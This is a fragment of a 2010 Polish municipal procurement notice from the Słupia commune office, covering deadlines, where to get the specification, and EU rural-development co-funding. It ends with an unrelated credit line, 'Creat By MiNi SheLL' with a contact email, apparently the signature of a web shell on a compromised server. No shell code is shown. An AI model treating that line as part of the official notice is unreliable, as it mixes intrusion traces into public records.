<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slupia.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Słupi
Słupia 136
96-128 Słupia
pokój Nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2010 godzina 10:00, miejsce: Urząd Gminy w Słupi
Słupia 136
96-128 Słupia
pokój Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Eropejskiej w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013, Oś 3 Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, Działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com